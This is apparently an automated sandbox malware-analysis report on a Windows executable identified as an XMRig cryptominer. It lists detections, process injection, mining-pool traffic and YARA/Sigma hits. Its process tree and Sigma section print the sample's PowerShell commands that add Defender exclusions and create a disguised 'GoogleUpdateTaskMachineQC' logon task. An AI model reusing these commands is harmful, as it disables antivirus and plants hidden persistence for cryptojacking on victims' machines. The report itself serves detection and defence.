Edit tour

Windows Analysis Report
h2qWqtD73F.exe

Overview

General Information

Sample name:	h2qWqtD73F.exe renamed because original name is a hash value
Original sample name:	d0c2dd0e059c5011ed2eee4c65122177.exe
Analysis ID:	1528505
MD5:	d0c2dd0e059c5011ed2eee4c65122177
SHA1:	a992a12930f59a9bff9a49337c004fef02a9fa4e
SHA256:	9db1d611bba928f40d86374641783083cda4f613236f3ec21ce62bcdeee9a6e6
Tags:	64exetrojan
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found strings related to Crypto-Mining

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Protects its processes via BreakOnTermination flag

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Writes to foreign memory regions

Yara detected PersistenceViaHiddenTask

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

h2qWqtD73F.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\h2qWqtD73F.exe" MD5: D0C2DD0E059C5011ED2EEE4C65122177)

dialer.exe (PID: 8108 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 2508 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 916 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 980 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 352 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 476 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 652 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1060 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

updater.exe (PID: 7012 cmdline: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe MD5: D0C2DD0E059C5011ED2EEE4C65122177)

dialer.exe (PID: 7816 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

svchost.exe (PID: 1332 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1364 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1452 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1504 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1624 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1660 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1668 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1836 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1864 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1972 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1980 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1992 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2044 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

spoolsv.exe (PID: 2136 cmdline: C:\Windows\System32\spoolsv.exe MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F)

svchost.exe (PID: 2220 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1120 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1132 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1192 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1288 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

powershell.exe (PID: 7880 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8124 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5320 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2744 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.2675524616.0000020422C06000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000010.00000002.2676628688.0000020422C5F000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000010.00000002.2654430567.0000020422302000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x5153a8:$a1: mining.set_target 0x510b88:$a2: XMRIG_HOSTNAME 0x512680:$a3: Usage: xmrig [OPTIONS] 0x510b60:$a4: XMRIG_VERSION
Process Memory Space: svchost.exe PID: 1060	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: updater.exe PID: 7012	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: updater.exe PID: 7012	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x9878f:$a1: mining.set_target 0x95351:$a2: XMRIG_HOSTNAME 0x95f06:$a3: Usage: xmrig [OPTIONS] 0x95332:$a4: XMRIG_VERSION
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.updater.exe.7ff6dd49ea80.7.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
20.2.updater.exe.7ff6dd49ea80.7.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x511928:$a1: mining.set_target 0x50d108:$a2: XMRIG_HOSTNAME 0x50ec00:$a3: Usage: xmrig [OPTIONS] 0x50d0e0:$a4: XMRIG_VERSION
20.2.updater.exe.7ff6dd49ea80.7.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x517901:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
20.2.updater.exe.7ff6dd49ea80.7.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x517e60:$s1: %s/%s (Windows NT %lu.%lu 0x518688:$s3: \\.\WinRing0_ 0x510b88:$s4: pool_wallet 0x50c990:$s5: cryptonight 0x50c9a0:$s5: cryptonight 0x50c9b0:$s5: cryptonight 0x50c9c0:$s5: cryptonight 0x50c9d8:$s5: cryptonight 0x50c9e8:$s5: cryptonight 0x50c9f8:$s5: cryptonight 0x50ca10:$s5: cryptonight 0x50ca20:$s5: cryptonight 0x50ca38:$s5: cryptonight 0x50ca50:$s5: cryptonight 0x50ca60:$s5: cryptonight 0x50ca70:$s5: cryptonight 0x50ca80:$s5: cryptonight 0x50ca98:$s5: cryptonight 0x50cab0:$s5: cryptonight 0x50cac0:$s5: cryptonight 0x50cad0:$s5: cryptonight
20.2.updater.exe.7ff6dd480000.4.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
20.2.updater.exe.7ff6dd480000.4.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x52eda8:$a1: mining.set_target 0x52a588:$a2: XMRIG_HOSTNAME 0x52c080:$a3: Usage: xmrig [OPTIONS] 0x52a560:$a4: XMRIG_VERSION
20.2.updater.exe.7ff6dd480000.4.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x534d81:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
20.2.updater.exe.7ff6dd480000.4.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x5352e0:$s1: %s/%s (Windows NT %lu.%lu 0x535b08:$s3: \\.\WinRing0_ 0x52e008:$s4: pool_wallet 0x529e10:$s5: cryptonight 0x529e20:$s5: cryptonight 0x529e30:$s5: cryptonight 0x529e40:$s5: cryptonight 0x529e58:$s5: cryptonight 0x529e68:$s5: cryptonight 0x529e78:$s5: cryptonight 0x529e90:$s5: cryptonight 0x529ea0:$s5: cryptonight 0x529eb8:$s5: cryptonight 0x529ed0:$s5: cryptonight 0x529ee0:$s5: cryptonight 0x529ef0:$s5: cryptonight 0x529f00:$s5: cryptonight 0x529f18:$s5: cryptonight 0x529f30:$s5: cryptonight 0x529f40:$s5: cryptonight 0x529f50:$s5: cryptonight
20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0768:$a1: mining.set_target 0x4ebf48:$a2: XMRIG_HOSTNAME 0x4eda40:$a3: Usage: xmrig [OPTIONS] 0x4ebf20:$a4: XMRIG_VERSION
20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4f6741:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4f6ca0:$s1: %s/%s (Windows NT %lu.%lu 0x4f74c8:$s3: \\.\WinRing0_ 0x4ef9c8:$s4: pool_wallet 0x4eb7d0:$s5: cryptonight 0x4eb7e0:$s5: cryptonight 0x4eb7f0:$s5: cryptonight 0x4eb800:$s5: cryptonight 0x4eb818:$s5: cryptonight 0x4eb828:$s5: cryptonight 0x4eb838:$s5: cryptonight 0x4eb850:$s5: cryptonight 0x4eb860:$s5: cryptonight 0x4eb878:$s5: cryptonight 0x4eb890:$s5: cryptonight 0x4eb8a0:$s5: cryptonight 0x4eb8b0:$s5: cryptonight 0x4eb8c0:$s5: cryptonight 0x4eb8d8:$s5: cryptonight 0x4eb8f0:$s5: cryptonight 0x4eb900:$s5: cryptonight 0x4eb910:$s5: cryptonight
20.2.updater.exe.7ff6dd4e1860.6.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
20.2.updater.exe.7ff6dd4e1860.6.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
20.2.updater.exe.7ff6dd4e1860.6.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
20.2.updater.exe.7ff6dd4e1860.6.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }, ProcessId: 8124, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7880, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 8108, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 916, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7880, ProcessName: powershell.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T00:24:58.988704+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.11	63517	1.1.1.1	53	UDP

ETPRO COINMINER XMR CoinMiner Usage

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T00:24:27.346115+0200	2826930	2	Crypto Currency Mining Activity Detected	192.168.2.11	49871	142.202.242.43	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: h2qWqtD73F.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmp	Avira: detection malicious, Label: HEUR/AGEN.1362356
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Avira: detection malicious, Label: HEUR/AGEN.1329646

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: h2qWqtD73F.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: h2qWqtD73F.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 7012, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: losestratum+tcp://
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: cryptonight/0
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: losestratum+tcp://
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Unpacked PE file: 20.2.updater.exe.28471390000.1.unpack

Source: h2qWqtD73F.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: @C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
